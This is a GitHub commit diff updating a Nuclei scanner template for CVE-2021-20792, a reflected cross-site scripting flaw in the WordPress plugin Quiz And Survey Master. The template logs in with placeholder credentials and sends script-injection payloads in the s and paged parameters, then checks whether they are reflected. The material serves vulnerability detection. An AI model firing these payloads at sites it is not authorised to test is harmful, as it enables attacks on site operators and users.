Update CVE-2021-20792.yaml

patch-1
Prince Chaddha 2022-02-08 23:56:17 +05:30 committed by GitHub
parent 5519bd7d67
commit 495ca9dc6c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 5 deletions

View File

@ -4,9 +4,10 @@ info:
name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: "Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors." description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
reference: reference:
- https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-20792
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
@ -22,24 +23,26 @@ requests:
Origin: {{RootURL}} Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
GET //wp-admin/admin.php?page=mlw_quiz_list&s="><script>alert(document.domain)</script>&paged="><script>alert(/XSS-paged/)</script> HTTP/1.1 GET /wp-admin/admin.php?page=mlw_quiz_list&s="></script><script>alert(document.domain)</script>&paged="></script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words:
- '<script>alert(document.domain)</script>'
part: body part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
part: header
words: words:
- "text/html" - "text/html"
part: header